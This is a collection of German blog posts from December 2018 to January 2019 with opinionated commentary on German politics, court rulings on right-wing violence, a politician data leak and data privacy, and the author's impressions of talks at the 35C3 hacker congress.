Und sie ist auch echt alleine auf weiter Flur. Der Deutschlandfunk hat sicher nicht nur sie um eine Stellungnahme gebeten. Alle anderen waren schlau genug, sich nicht zu äußern.
Wer wählt eigentlich diese Grünen immer? Habt ihr nicht mitgekriegt, mit was für Personal die da "arbeiten"?
Update: Jan Böhmermann hat mich auch überrascht. Ich dachte nicht, dass der es nötig hat, persönliche Beleidigungen zu bringen. Never offend people with style when you can offend them with substance.
Oder anders gesagt: Was Peter über Klaus sagt, sagt mehr über Peter als über Klaus.
Update: Oder noch anders gesagt: Great Minds Discuss Ideas; Average Minds Discuss Events; Small Minds Discuss People.

Tue Jan 29 2019

[l] Christine Haderthauer erzählt aus der CSU. Und da werden sorgfältig alle Klischees abgearbeitet:
ZEIT: Sie haben eine steile Karriere in der CSU gemacht, Sie wurden Generalsekretärin, als erste Frau in diesem Amt. Welche Dinge muss man lernen, wenn man als Frau so rasch aufsteigt?
Haderthauer: Ich musste die Währungen verstehen, die in einer männerdominierten Partei wie der CSU gelten. Und das ist – entgegen meiner anfänglichen Erwartung – eben nicht in erster Linie die Sacharbeit, sondern vor allem Präsenz, Redeanteil, Status, Seilschaften. Sieh zu, dass du dich in Sitzungen immer zu Wort meldest, möglichst zu Beginn. Du solltest eine tragende Stimme haben und nicht zu kurz reden. Ein Meister deines Fachs bist du, wenn du möglichst den Vorsitzenden zitierst, den einen oder anderen deiner Gefolgsleute lobst und dann am besten noch die Ehefrau erwähnst, die dir am Frühstückstisch dies oder das mitgegeben hat, als Beleg dafür, dass du dein Ohr am Volk hast, obwohl du eigentlich lebst wie ein Zombie und gar nicht mehr weißt, was Alltag ist. Diese Statusspielchen habe ich völlig unterschätzt.
Kein Wunder, dass sich da so ein Gefühl von ritualisierter Vollverkrustung einstellt und man selbst bei guter Belüftung Erstickungsgefühle kriegt.
Haderthauer: Ich sagte: Das ist doch Käse, dass ich etwas sage, was schon gesagt wurde. Oder etwas, das ganz unwichtig ist. Er meinte: Darum geht’s nicht. Du musst dich melden und in jeder Sitzung etwas sagen. Da wusste ich am Anfang meiner Wortmeldung manchmal tatsächlich noch nicht, was ich am Ende sagen würde, aber es kam dann meist was Brauchbares dabei raus.
"Was ganz brauchbares", indeed. Im Vergleich zu den anderen Heißluftgebläsen dort.
Ich wünsche mir mehr Frauen in der Politik, wenn die die einzigen sind, die solche Sachen mal offen ansprechen können. Was für ein Bullshit. Dafür haben wir den Parlamentarismus nicht eingeführt. (Danke, Andreas)

Mon Jan 28 2019

[l] Die Steiermark 2015 ihre ganzen Kleinst-Kommunen zusammengelegt, um Geld zu sparen. Ergebnis:
In 97 Prozent aller Fusionsgemeinden seien die Verwaltungskosten nach der Reform höher als davor. Im Detail sprangen die Verwaltungsausgaben pro Kopf vom Jahr 2014 auf 2015 von 537 Euro auf 603 Euro, also ein Plus von 12 Prozent. Im gleichen Jahr sind die Kosten bei nicht fusionierten Gemeinden um 1,6 Prozent auf 556 Euro gefallen.
Allerdings:
Vor 2015 hatte es sehr viele Kleinstgemeinden mit wenig Einwohnern und negativen Budgets gegeben.
Nun ist natürlich die offensichtliche Interpretation, dass die halt frisch fusioniert sind und noch nicht so gut eingespielte Teams sind, dass das also praktisch Einmalkosten sind. Das scheint aber leider nicht der Fall zu sein:
Allerdings seien auch in den zwei Jahren danach die Verwaltungskosten in fusionierten Gemeinden ähnlich stark wie in nicht fusionierten Gemeinden gewachsen.
Ja gut, wer "Yes, Minister" geguckt hat, weiß, dass das immer so ist in Verwaltungen. Die Kosten kennen normalerweise nur eine Richtung: Nach oben.
Aber ein Schmankerl hat die Story noch:
Landesrechnungshofdirektor Heinz Drobesch will sich laut „Kleine Zeitung“ ab 2020 ansehen, ob die Fusionen gut gemacht worden seien.
Das ist nach den Wahlen. (Danke, Wolfgang)

Sun Jan 27 2019

[l] Ratet mal, wer letzten September die strukturelle Prüfung des Damms in Brasilien gemacht hat, der gerade katastrophal gebrochen ist, mit vielen Toten?
Na?
Kommt ihr NIE drauf!
TÜV Süd.
Vielleicht sollten die bei nutzlosen Gütesiegeln für Webseiten bleiben.

Sun Jan 20 2019

[l] Die katholische Kirche hat sich ja viel zu Schulden kommen lassen. Die hat eigentlich bei so gut wie allen schlimmen Dingen teilgenommen, die die Menschheit so gemacht hat, oder war sogar treibende Kraft hinter ihnen. Nur Big Data und Social Media noch nicht. Nun, das ist jetzt vorbei. Es gibt jetzt eine Bet-App vom Papst, mit Accounts und Login. Die katholische Kirche lässt sich doch nicht von ein paar Tech-Firmen abhängen!1!!
[l] Oh wow. Erinnert ihr euch noch, als die TU München einen guten Ruf hatte? Das war, bevor sie sich ein KI-Ethik-Institut von Facebook bezahlen ließen.
Facebook Inc. is endowing a new institute devoted to the ethics of artificial intelligence at the Technical University of Munich, in Germany.
Bestimmt haben die sich das total schön ausgemalt. Ein tolles neues Institut, unabhängige Forschung, auch Facebook-kritisch natürlich, und Pecunia non olet. Aber ich vermute mal, dass die Studentenschaft da nicht so glücklich mit sein wird.
Gut, was man nach dem Studium mit einem Ethik-Abschluss macht, ist mir gerade eh nicht so klar, aber wenn da auch noch Facebook draufsteht…?
Wieso ist Facebook damit zur TU München gegangen? Ob die sich vorher informiert haben?

Sat Jan 19 2019

[l] Unter den Abtreibungsgegnern in den USA gibt es auch säkulare Nicht-Fundi-Christen. The Atlantic hat eine Story über sie gemacht. (Danke, Pavel)

Mon Jan 14 2019

[l] Bing hat einen bedauerlichen Fall von KI-Irrtum. Schade nur, dass da jetzt keiner für verantwortlich ist. War ja die KI, die den Fehler gemacht hat. Hätte uns doch nur jemand gewarnt!

Sun Jan 13 2019

[l] NRW fährt eine neue Strategie gegen "Clan-Kriminalität" (gemeint sind arabische Großfamilien). Sie haben eine Aktion mit lauter Razzien gemacht, um kurz nach Mitternacht. Ergebnis:
14 Festnahmen, 100 Strafanzeigen, 500 angezeigte Ordnungswidrigkeiten beispielsweise wegen des Verstoßes gegen das Rauchverbot in Bars. In Essen wurde ein Verdächtiger mit 9000 Euro Bargeld und mehreren EC-Karten festgenommen, insgesamt wurden mehrere Hundert Kilo unversteuerten Tabaks sowie zehn Waffen, etwa verbotene Messer und Schlagstöcke, konfisziert.
Ja gut, äh, … da hätte man ja schon irgendwie mehr erwartet, denn die Razzien gingen ja "gegen die organisierte Kriminalität". Doch nicht so kriminell oder wie?
Deshalb ist die Großaktion vom Samstag auch Show, auch Machtdemonstration des Staates. "Es soll weh tun, es soll sie stören", sagt Reul vorm "Essence".
Oh ach soooo. Das ging hier nicht um Inhalte! Dann faselt aber auch nicht was von "massivste Razzia gegen die organisierte Kriminalität" herum.
Aus meiner Sicht sieht das eher wie die massivste Razzia gegen ausländische Geschäftsleute aus.
Ich hatte ja insgeheim gehofft, dass die einen Plan haben, wie sie gegen die organisierte Kriminalität vorgehen wollen. Das scheint ja eher der James-Bond-Film-Plan zu sein hier. Hingehen, einen auf dicke Hose machen, und hoffen, dass sie Fehler machen. So funktioniert das fürchte ich im richtigen Leben nicht.

Fri Jan 11 2019

[l] Die Gelbwesten haben in Frankreich 60% der Geschwindigkeits-Blitzerkameras kaputtgemacht. Das ist ein schlauer Schachzug. Da haben sie den Staat richtig doll mit geärgert aber bei der Bevölkerung Sympathiepunkte eingespielt, und weil sie nicht alle kaputtgemacht haben, können die Leute jetzt auch nicht sorglos herumrasen. Nicht doof!

Wed Jan 9 2019

[l] Setzt euch mal bitte stabil hin. Für die Meldung hier werdet ihr das brauchen.
Es geht um die schleichende Normalisierung rechter Gewalt als "bloß ein armes Würstchen aus dem Internet" (um mal völlig unpassend die Ausrede zu übernehmen, die die Polizei mir gegenüber damals brachte). Der ganze Artikel ist ein einziges Money Quote. Ich muss da mal großflächig zitieren.
Der erste Fall ist jemand, der auf einer Mai-Demonstration "mit dem Auto Jagd auf Menschen gemacht und sie mit Steinen beworfen" haben soll.
Carsten M. und seine Freundin trugen dabei schwarze T-Shirts mit der Aufschrift "Aryans - Support your race".
Also hat die Polizei eine Hausdurchsuchung gemacht, die so ablief:
Pistolen, Messer, Armbrüste, sogenannte Polenböller, Schwarzpulver, mehrere Behälter mit Stahlkugeln [...] "In nahezu jedem Raum", so notierten es die Polizisten, "befanden sich Nazi-Devotionalien." Mal eine SS-Flagge, nur seitenverkehrt aufgehängt, mal Aufkleber der "Division Braune Wölfe", einem gewaltbereiteten Zusammenschluss bundesweit aktiver Neonazis. Und auch ein laminiertes Schild wurde gefunden mit dem Aufruf: "Volksgenosse, trittst Du ein, soll Dein Gruß 'Heil Hitler' sein."
Gut, denkt ihr euch jetzt vielleicht, einen klareren Fall von rechtsradikaler Gewalt kann man sich kaum als Gedankenexperiment konstruieren. Der wird für Jahre im Knast verschwunden sein. Nun, nicht ganz.
Die zuständige Staatsanwältin in Halle hält den Fall für "typisches Alltagsgeschäft" und hat den Fall, der nun am Landgericht verhandelt wird, darum auch nur am Amtsgericht angeklagt. Sie begründete das in einer Stellungnahme so: "Die von den Angeklagten gezeigte Aggressivität geht nicht über das hinaus, was bedauerlicher Weise im Umfeld sogenannter politischer Veranstaltungen inzwischen üblich ist."
Öhm... wut? Geht noch weiter! Die Waffenfunde und Nazi-Devotionalien seien ja bloß in der Wohnung gewesen, und es gäbe keine Anhaltspunkte dafür, dass er die öffentlich zeigen wollte.
"Die Ausgestaltung der eigenen vier Wände ist, sofern keine Außenwirkung eintritt, in der Bundesrepublik Deutschland jedem überlassen"
Und diese Art von Fällen gibt es bei der Staatsanwaltschaft im Osten offenbar häufiger. Ein Kampfsportler bedroht Journalisten mit "Die Wahrheit, oder eure Köpfe auf den Tisch". Die Staatsanwältin findet:
"Es wird damit nicht eindeutig ein zukünftiges Verbrechen angedroht, sondern eher sprichwörtlich zur wahrheitsgemäßen Berichterstattung aufgefordert"
Oh ach SO ist das!
Aber der geilste Fall kommt ganz am Ende des Artikels. Szenario: Mann dringt in Wohnung eines Liberianers ein, angeblich weil er zu laut "Kanakenmusik" gespielt hat.
Sie kamen mit Schlagstock und Schlagring und schlugen die Frau bewusstlos, verletzten den Mann und sogar den fünf Jahre alten Enkel der Deutschen, der in der Wohnung war.
Das ist ja schon krass, aber es wird noch besser. Die Polizei besucht den Mann also, und er zeigt ihnen am Eingang erst einen Reichsbürgerausweis, dann seinen NPD-Mitgliedsausweis.
Dennoch sah das Gericht keine Anhaltspunkte dafür, dass die Tat vielleicht einen fremdenfeindlichen Hintergrund hatte. Es zog sich ganz formalistisch aus der Affäre: Weil die Polizei nicht das Datum auf den Ausweisen notiert hatte, könne man nicht feststellen, ob die beiden Ausweise vielleicht schon abgelaufen gewesen seien. Die beiden Männer kamen mit Bewährungsstrafen davon.
Und das war das Gericht, nicht die Staatsanwaltschaft diesmal.

Fri Jan 4 2019

[l] Es gab gerade eine konzertierte Veröffentlichung privater Daten von Politikern und Künstlern, die der rechten Szene ein Dorn im Auge sind.
Nun kann man sich da endlos in Analysen ergehen, wo diese Daten jetzt hergekommen sein könnten, was für kriminelle Energie diese Leute gehabt haben müssen, was sie damit bewirken wollten, etc. Finde ich alles nicht interessant.
Zwei Dinge dazu. Erstens. Seit Jahrzehnten betreibt die Politik eine konzertierte Aktion nach der anderen, um den unwilligen Bürgern ihre Daten zu entreißen und in Datenbanken zu tun, wo dann überproportional politisch rechts verortete Polizisten und "Sicherheitsbeamte" drauf Zugriff haben. Wo ist hier noch gleich die Überraschung? Dass es erst jetzt in dieser Form passiert oder wie?
Nicht nur die Rechten sind hier Täter. Wikipedia z.B. listet bei diversen ihrer Meinung nach Prominenten das Geburtsdatum. Wo haben sie die her? Aus öffentlichen Datenbanken wie Gewerbeanmeldungen u.ä. Wohl dem, der dort gezielt falsche Daten hinterlegt hat. Mich hat niemand gefragt, ob ich einen Wikipedia-Artikel unter meinem Namen haben will, und ob das OK ist, da ein Foto oder mein Geburtsdatum zu veröffentlichen. Und was passiert da, trotz DSGVO und allem? Nichts.
Zweitens: Die Asymmetrie der Reaktion finde ich schockierend. Ich hatte mal auf Twitter einen Mordaufruf. Ich habe also Anzeige erstattet. Ein paar Wochen später rief dann die Polizei bei mir zuhause an und sagte, das Verfahren würde eingestellt. Das ist doch bloß ein Verrückter aus dem Internet. Bestimmt ein ganz armes Würstchen. Mag ja alles sein, aber es ist auch ein Täter. Keine Reaktion.
Bei mir Mordaufruf, keine Reaktion. Martin Schulz ruft jemand auf der "privaten Telefonnummer" an, und sofort republikweiter Riesenskandal und der Staatsschutz schaltet sich ein. Der Typ, der da anrief, war nicht mal unfreundlich oder bedrohlich.
Ich will mich da jetzt nicht als Betroffener aufspielen, nur mal die Dissonanz illustrieren. Die Presse erzählt bisher vor allem von Youtubern als Opfer, und ich bin mir auch sicher, dass die es viel schlimmer haben. Nur bei mir weiß ich es halt, bei denen ist es nur Hörensagen für mich :-)
Was mich übrigens auch richtig doll ärgert ist wenn Hotels meine persönlichen Daten haben wollen. Wieso hat diesen Datenhahn noch niemand zugemacht? Nein, liebe Lokalpolitiker, ihr müsst nicht meine Anschrift und mein Geburtsdatum wissen, nur weil ich in eurem Bundesland in einem Hotel übernachte.
Solange die Situation so ist, wundert mich überhaupt nicht, dass es solche Veröffentlichungen gibt. Ich gönne den Politikern das sogar ein bisschen. Die Künstler auf der Liste tun mir leid, die sind da unverschuldet zwischen die Fronten geraten.
Was mich auch richtig ärgert: Dass das beherzte Einschreiten des Staatsschutzes jetzt verhindern wird, dass die Politik erkennt, wie dringend sie mal handeln müssten, wie wichtig das ist, hier mal flächendeckend Datensparsamkeit zu fahren. Die reden immer davon, dass Daten das Öl des 21. Jahrhunderts sind, und merken gar nicht, dass sie auf einem Ölteppich schwimmen, der systematisch alles Leben vergiftet.
Update: Passt gerade wie Arsch auf Eimer:
Marriott reveals 5 million unencrypted passport numbers were leaked in 2018 data breach
Update: Ja nee klar, meine Telefonnummer ist Freiwild für Umfragen, Telemarketer und indische Callcenter von Microsoft-Scammern, aber bei euch ist das ein ANGRIFF AUF DIE DEMOKRATIE!1!!, wenn jemand anruft. Go fuck yourselves, echt mal.
Update: Jetzt wo so viele Politiker das als Cyberangriff bezeichnen: Hey, vielleicht hättet ihr mal auf uns hören und in defensive Cyber investieren sollen statt immer nur Offensive?

Mon Dec 31 2018

[l] Erklärtes Ziel dieses Blogs ist ja, den Argumenten auf beiden Seiten Raum zu geben. Das gilt natürlich auch für das Blog selbst. Gestern hat jemand auf Twitter einen fetten Thread zu meinem Blog gestartet. Hier ist er. Lest ihn euch durch!
Übrigens, Pro-Tipp an Fefe-Basher: Ihr müsst keine Screenshots machen, ihr könnt einfach direkt auf die Artikel linken. Bei mir fliegen keine alten Artikel raus, nur weil sie mir peinlich wären oder weil sie kritisiert werden. Ich ändere überhaupt nur unter sehr seltenen Umständen Artikel nachträglich, und wenn dann ist das in der Regel via Update am Ende. Der Teil davor bleibt. Entweder ich habe keinen Fehler gemacht, wieso würde ich das dann löschen. Oder ich habe einen Fehler gemacht, dann stehe ich selbstredend zu dem. Zu Fehlern muss man stehen. Wenn ihr aber Screenshots verbreitet, dann diskriminiert ihr Menschen mit Sehschwäche, deren Software die Screenshots nicht vorlesen kann.
Ich will das inhaltlich nicht groß kommentieren, denn die Meinung sollt ihr euch ja selber bilden. Aber achtet mal bei den einzelnen Punkten auf zwei Dinge:
1. Werde hier ich zitiert oder ein Leserbrief
2. Äußere ich mich tatsächlich gegen progressive Ideale und Ziele oder äußere ich mich kritisch gegen einzelne Methoden zur Erringung der progressiven Ziele?
Ich würde mir ja wünschen, wenn mehr Leute sowas machen würden. Evidenzbasierte Diskussionen sind mir Größenordnungen lieber als rein emotionales Rumshitstormen. Daher Danke an the_asak für diesen Beitrag, und jetzt bildet euch mal schön eure Meinung!
Update: Ich unterscheide hier frech zwischen Kritik an den Methoden und Kritik an den Zielen. Vielleicht irre ich mich damit ja auch und das ist aus eurer Sicht das selbe. Lasst euch das also auch bitte nicht von mir vorgeben, sondern überlegt euch das selbst!

Sun Dec 30 2018

[l] So, ich bin wieder zuhause und werde jetzt erstmal ein paar Tage durchschlafen glaube ich. Ich sah heute so fertig aus, dass ich schon von Engeln angesprochen wurde, ob es mir gut geht (zumal es auf Twitter anscheinend Aufrufe zur Gewalt gegen mich auf dem 35c3 gab). Ja, mir geht es gut, mich hat auch niemand zu verprügeln versucht. Alles gut.
Ich bin ein bisschen traurig, dass ich nicht noch mehr Vorträge mitnehmen konnte. Ein paar waren aber noch. Hmm, IFG hatte ich ja schon berichtet (unterhaltsam und inspirierend). Ah, mein nächster Vortrag war memsad von meinem Kumpel Ilja. Da ging es um eine wichtige Prämisse, die ich auch mal im Blog hatte vor ein paar Jahren. Ilja hat daraus mal eine Übersicht gemacht, und das bei allen Compilern ausprobiert, die er finden konnte, und stellt auch die verschiedenen Ansätze vor, wie Krypto-Libraries das lösen. Highlight des Vortrags war allerdings, dass er einen 5-Zeilen-Patch für gcc gehackt hat, der beim Wegoptimieren von memset eine Warnung ausgibt, und damit mal OpenSSL und Kerberos kompiliert hat — und Warnungen kriegte! Oops.
Danach haben wir die Jung und Naiv Aufnahme gemacht (1 Stunde 15 Minuten Aufnahme und dann haben wir uns nochmal gefühlt eine Stunde festgeplaudert, das hätten wir Deppen auch mal aufnehmen sollen), und als das durch war, eilte ich zum Steini-Flashmob, der wie gesagt wunderschön war. Da stand auch eine Kamera, insofern hoffe ich, dass es eine Aufzeichnung gibt. Beim Congress laufen ja eh immer eine Menge tiefenentspannte, glückliche Menschen herum, aber nach dem Steini-Vortrag war das besonders auffällig :-)
Heute wollte ich eigentlich mit Microtargeting eröffnen, aber da hat mir der ÖPNV in Leipzig einen Strich durch die Rechnung gemacht. Die erste Tram fuhr mir vor der Nase weg. 10 Minuten warten. Die andere hielt 100m weiter hinten neben einem anderen Zug, und als die Leute da hineilten, machte der spontan die Türen zu und fuhr weg. 10 Minuten warten. Den nächsten Zug bekamen ich und die anderen verdutzten Fahrgäste dann, aber da war der Vortrag schon halb vorbei. Schade.
Der Fahrplan dieses Jahr hat mit verschiedenen Vortrags-Längen experimentiert, was leider ein paar Mal so richtig nach hinten losging. Nach dem djb-Vortrag gab es 0 Minuten Abstand zum Sonneborn, aber der war einmal über das Gelände (~10 Minuten Leute mit Skateboard/Roller oder für Sprinter, und ich bin weder noch). Daher habe ich dann den netzpolitischen Wetterbericht nicht gucken können, sonst hätte ich den Anfang von Let's reverse engineer the Universe verpasst. Der Vortrag war sehr schön, hat mir gut gefallen. Gut, war kein Steini-Vortrag, aber auf jeden Fall honorable mention. Die Vortragende war auf jeden Fall sehr enthusiastisch und hat auch ein hohes Niveau durchgehalten, ohne dabei Zuschauer zu verlieren. Sehr schön, kann ich empfehlen.
Dann lief ich zu den Security Nightmares rüber, wo schon 45 Minuten vor dem Talk das Parkett weitgehend vollbesetzt war. Heilige Scheiße. Um den Zug zu kriegen, musste ich dann leider recht überpünktlich raus und habe das Ende nicht mitgekriegt. Insgesamt habe ich aber aus früheren Jahren die Zuschauerinteraktion als größer in Erinnerung. Eher so ein Dauer-Q&A und die Vortragsfolien nur als Themen-Vorgabe und Assoziationshilfe. Gut, ich war auch echt durch und müde, insofern kann ich das jetzt nur unterdurchschnittlich objektiv beurteilen, aber es fühlte sich eher … langsam an? Zu langsam, fand ich. War ein bisschen die Luft raus. Aber dem Publikum gefiel es, und das ist ja was zählt.
In der Tram hörte ich dann den Kritikpunkt am Congress, der sei zu seicht geworden, zu wenig harte Tech-Talks. Das hört man seit ich beim Congress dabei bin, und das sind jetzt über 20 Jahre. Ich halte das für eine kognitive Illusion. Erstens entwickelt ihr euch als Publikum weiter, das verschiebt eure Anspruchshaltung. Zweitens erinnert ihr euch nicht an alle Vorträge sondern an die "guten", und in eurem Gedächtnis ist der Vergleichsrahmen dann "alle Vorträge dieses Jahr" und "die guten Vorträge letztes Jahr". Ich kann euch versichern: Die Tech-Talks auf den Congressen waren nicht immer alle "hart". Ich weiß das, denn ich habe einige von ihnen gehalten. Guckt euch nur mal meinen Routing-Vortrag aus dem Jahre 2000 an. Der würde heute auch nicht als "hart" durchgehen, eher als strukturierte Einführung. Bitte guckt ihn euch nicht zu genau an, ich war jung und wusste viel weniger :-)
Aber, nochmal, dass es früher nur voll die krassen Ultra-Tech-Talks gab, das ist glaube ich eine Illusion.
Was ja nicht heißt, dass man sich nicht für die Zukunft mehr davon wünschen könnte. Dem würde ich aber entgegenhalten wollen, dass es so schon praktisch unmöglich ist, sich einen konfliktfreien Pfad mit allen Tech-Talks durch den Fahrplan zu suchen. Und sobald man sich auch für Science oder Politik interessiert, ist es ganz vorbei.
Mich hat eher die Ausrichtung der Tech-Talks ein bisschen gestört dieses Mal. Das ist aber nicht Congress-spezifisch, sondern bei fast allen Security-Konferenzen so. Praktisch alle Security-Vorträge sind über offensive Dinge. Wie man A hackt, wie man B hackt, Angriffe auf C, VM-Ausbruch bei D, alles kaputt, alles im Eimer. Aber die Vorträge, die mal Strategien zu entwickeln versuchen, was man denn besser machen könnte, die sind völlig unterrepräsentiert. Auf diesem Congress gab es ein paar. Ich würde memsad dazu zählen wollen, und es gab ein paar Talks über formale Verifikation von Code. Das habe ich immer negativ gesehen, mit dem Argument, dass die Verifikation mindestens genau so komplex wie der zu verifizierende Code wird, und der ist schon zu komplex, sonst bräuchten wir ja die Verifikation nicht. Aber im Quantenkrypto-Vortrag von djb und Tanja Lange meinte djb gegen Ende, dass er da seine Meinung geändert hat, weil die Tools so viel besser geworden sind. Da muss ich also auch nochmal genauer hingucken, ob ich meine Einstellung ändern muss.
Jedenfalls: Wenn man da am Tech-Programm was tun sollte, meiner Ansicht nach, dann wäre es: Mehr defensive Sicherheit. Das ist ironischerweise genau das, was der CCC immer der Bundesregierung vorhält, dass sie alle ihre Mittel in offensive Security steckt und nicht in defensive. Nun, äh, wie wäre es, wenn der Club da mit gutem Beispiel vorangeht?

Sat Dec 29 2018

[l] Im Internet findet man gerade ein paar Kritiken am 35C3-Programm, dass das Programm zu politisch geworden sei, dass sich Nerds im Programm unterrepräsentiert fühlen, und einige (besonders AfD-Sympathisanten) ärgern sich über die vielen Feminismus-Inhalte und die Anti-AfD-Positionen. Wenn man reinkommt, hängt am Eingang erstmal eine fette Antifa-Fahne. Die hat da nicht der CCC hingehängt, vermute ich mal. Aber ich kann die Kritik verstehen.
Mir ist im Programm aufgefallen, dass da so ein halbes Dutzend Vorträge von Netzpolitik.org-Personal bestritten wird (je nach dem wie man das zählt). Ich habe jetzt nichts gegen Netzpolitik.org, ich verlinke die ja auch gerne und häufig. Aber es stellt sich schon so ein bisschen die Frage, wieso die das nicht auf der Republica machen sondern beim CCC. Und auf CCC-Seite stellt sich die Frage, ob es da in der Szene wirklich nur die gibt, oder ob hier andere Projekte nicht beachtet wurden, weil man halt auf persönlicher Ebene befreundet ist oder so. Die Neutralität des CCC war eigentlich immer ein hohes Gut. Netzpolitik.org steht traditionell den Grünen nahe.
Wenn man sich das objektiv anzugucken versucht, wird man feststellen, dass wir heute auch viel mehr Tracks als früher haben, und die Polit-Vorträge daher eigentlich nichts verdrängt haben, sondern ein Zusatzangebot sind. Insofern nicht so schlimm alles. Aber ich kann schon nachfühlen, wo die Kritik herkommt.
Und ich finde auch, dass der Club mehr auf seine Neutralität Wert legen sollte, und Leuten nicht vorschreiben sollte, wen sie wählen sollen. Man muss die AfD nicht toll finden, aber solange die nicht eine verfassungsgefährdende Organisation sind und zu den Wahlen zugelassen sind, ist das meines Erachtens Teil der Demokratie, dass man deren Existenz halt aushalten muss. Toll finden muss man es nicht. Aber aushalten. Privatleute (inklusive der Pressesprecher des CCC) können natürlich gerne ihr Demonstrationsrecht ausüben und ihre Meinung sagen; von von mir aus auch gewaltlos protestieren. Aber der Club als Organisation? Der sollte neutral bleiben.
Update: Nur dass da keine Unklarheiten entstehen: Ich habe auch ein Problem mit der AfD und demonstriere gegen sie und finde, das sie für einige ihrer Ansichten bekämpft gehört. Ich bin lediglich anderer Meinung als der CCC darüber, welche Rolle der CCC dabei spielen sollte.
Update: Ich habe übrigens auch vereinzelt besorgte Mails über die Slots gekriegt, die dieses Jahr DIE PARTEI gekriegt hat. Ich habe mich hier im Blog schon als PARTEI-Sympathisant geouted, und habe mir den Sonneborn-Vortrag natürlich angeschaut (im Stream, bin nicht mehr reingekommen). War das jetzt Wahlkampf, was er da gemacht hat? Ich glaube, wäre der Slot an die AfD gegangen und sie hätten analoges Programm gefahren, wäre die Antwort klar "ja" gewesen. Ein Leser schrieb mir noch:
Im Vortrag "Mind the Trap: Die Netzpolitik der AfD im Bundestag" ging es um den Opferrolle der AfD am Beispiel des NetzDG. Ich verstehe die Vortragende so: Wer gegen das NetzDG ist, ist Trans- und Frauenfeindlich, Holocaustleugner oder säht Hassrede im Internet. Das ist doch recht überraschend für einen Vortrag auf dem 35C3, da der CCC sich ebenfalls stark gegen das NetzDG positioniert hat.
Die Vortragende in dem Vortrag war, wenn ich das richtig gesehen habe, Mitarbeiterin eines Abgeordnetenbüros der Grünen. Daher bin ich da gar nicht erst hingegangen. Natürlich hätte man da trotzdem Erkenntnisgewinn mitnehmen können, aber so hat das ein Geschmäckle. Zumindest eine Kooperation mit Mitgliedern mehrerer Parteien hätte man da machen müssen, finde ich.
Update: Dieser Blogpost ist beim CCC eher schlecht angekommen, daher hier kurz das Ergebnis meiner Gespräche bisher. Erstens: Der Club sieht sich nicht als neutral, sondern hat einen Konsens, dass Rassismus und Ausländerfeindlichkeit bekämpft werden müssen, der in der Unvereinparkeitserklärung 2005 kodifiziert wurde. Das war mir bekannt, denn ich war damals Mitglied und habe das mitgetragen und mitgezeichnet. Der Club sieht einen Rechtsruck in der Gesellschaft und möchte sich da inhaltlich gegen positionieren. Das konnte man ja auch im CCC Jahresrückblick sehen, wo Erdgeist eine klare Positionierung formuliert hat. Zweitens: Hauptreibepunkt war meine Formulierung, dass man in einer Demokratie Andersdenkende "aushalten" müsse. Der CCC befürchtete, dass ich damit meinte, man solle auch der AfD eine Bühne bieten. Das meinte ich explizit nicht. Drittens gab es wohl unterschiedliche Deutungen, was Überparteilichkeit bedeutet. Mir ist zugegeben auch nicht völlig klar, was das heißt. Das war ja auch so ein bisschen meine Frage in diesem Beitrag. Heißt das, dass man keine Partei reden lassen darf auf dem Congress?
Viertens, nicht zum CCC sondern über Netzpolitik.org: Mir wurde mitgeteilt, dass ich hier Propaganda der Identitären befördere, wenn ich schreibe, Netzpolitik.org sei traditionell Grünen-nahe. Ich versuche gerade, ein Gespräch mit denen zu organisieren. Mein Eindruck im Moment ist jedenfalls, dass die sich nicht als Grünen-nahe sehen und den Kritikpunkt sofort mit irgendwelchen rechten Trollen assoziieren. Das war nicht meine Intention und ich bitte um Entschuldigung, falls ich hier die Unwahrheit behauptet habe. Ich möchte aber auch darauf hinweisen, dass das nicht der Kern des Kritikpunktes war, ob und welcher Partei die jetzt nahestehen oder halt nicht.

Fri Dec 28 2018

[l] So ihr Lieben, die Congress-Ermüdung setzt dieses Jahr früher ein, oder vielleicht werde ich auch einfach älter. :-)
Ich bin gestern in den Fax-Vortrag nicht mehr reingekommen und muss da auf die Aufzeichnung ausweichen. Der nächste Slot war für mich die Quantenmechanik. Ich bin jetzt kein großartiger Mathematiker oder gar Physiker, aber der Vortrag hat mir nicht weiter geholfen. Das fühlte sich so ein bisschen an wie wenn man in der Bibliothek das Inhaltsverzeichnis von einem Fachbuch über Quantenmechanik liest. Man hat danach die Begriffe mal gehört, und ein paar tolle griechische Buchstaben gesehen, aber wenn man das vorher nicht verstanden hat, hat man es nachher auch nicht verstanden. Der Vortragende war aber sehr enthusiastisch und wirkte kompetent, ich will das nicht kleinreden. Ob der Anspruch überhaupt erfüllbar ist, ist natürlich die nächste Frage.
Von dem Fernsehrat-Vortrag habe ich Gutes gehört, von den Gesundheitsdaten habe ich jemanden getroffen, der es enttäuschend fand, mit was für lächerlichen Methoden die dieses System gehackt haben. Der hatte da eher einen MacGyver-Vortrag erwartet oder so. Das ist das wohl nicht. Die haben da eher fundamentale Anfängerfehler gemacht.
Mein nächster Talk war über die Polizeigesetze. Gut, dem folge ich ja ein bisschen, daher war da jetzt inhaltlich nicht viel neues drin. Aber es macht schon echt schlechte Laune, auf was für flächendeckendem Niveau wir gerade die Rechtsstaatlichkeit als nicht mehr benötigtes Relikt abschaffen in dieeem Land. Aber für mich war ja schon alles gesagt, als die Bayern die unbegrenzte Freiheitsberaubung von unschuldigen Menschen beschlossen haben, nur weil jemand glaubt, von ihnen ginge eine diffuse unkonkrete Bedrohung aus. Die anderen Länder haben Limits, aber auch keine, die das Instrument für mich irgendwie akzeptabel machen. Wer dem nicht so im Detail gefolgt ist, für den lohnt sich der Vortrag aber. Am Ende haben sie ein paar Forderungen aufgestellt, bei der es wahrscheinlich hilfreich wäre, wenn ihr die alle mal zur Kenntnis nehmt, damit der Protest ein bisschen kanalisiert wird und nichts unbekämpft lässt, das bekämpft gehört.
Heute morgen ging es los mit dem Fake-Science-Vortrag, von dem ich aber nur das Ende mitgekriegt habe. Das gucke ich mir auf jeden Fall nochmal auf Video an. Es gab aus dem Publikum ein bisschen die (auf mich berechtigt wirkende) Kritik, dass man da "etablierten Journals" zu viel inhärente Unkorrumpiertheit unterstellt. DIe Vortragenden sind investigative Journalisten, nicht selber aktive Uni-Wissenschaftler, nur so zur Einordnung dessen, was euch erwartet. Die Methoden waren ein bisschen Gonzo-mäßig, die haben da Artikel eingereicht, in denen dann R.Funden und Mahmud Achmedinedschad als Autoren genannt waren, und die inhaltlich offensichtlicher Bullshit waren. Wenn euch solcher Klamauk nicht stört, ist das ein guter Vortrag für euch.
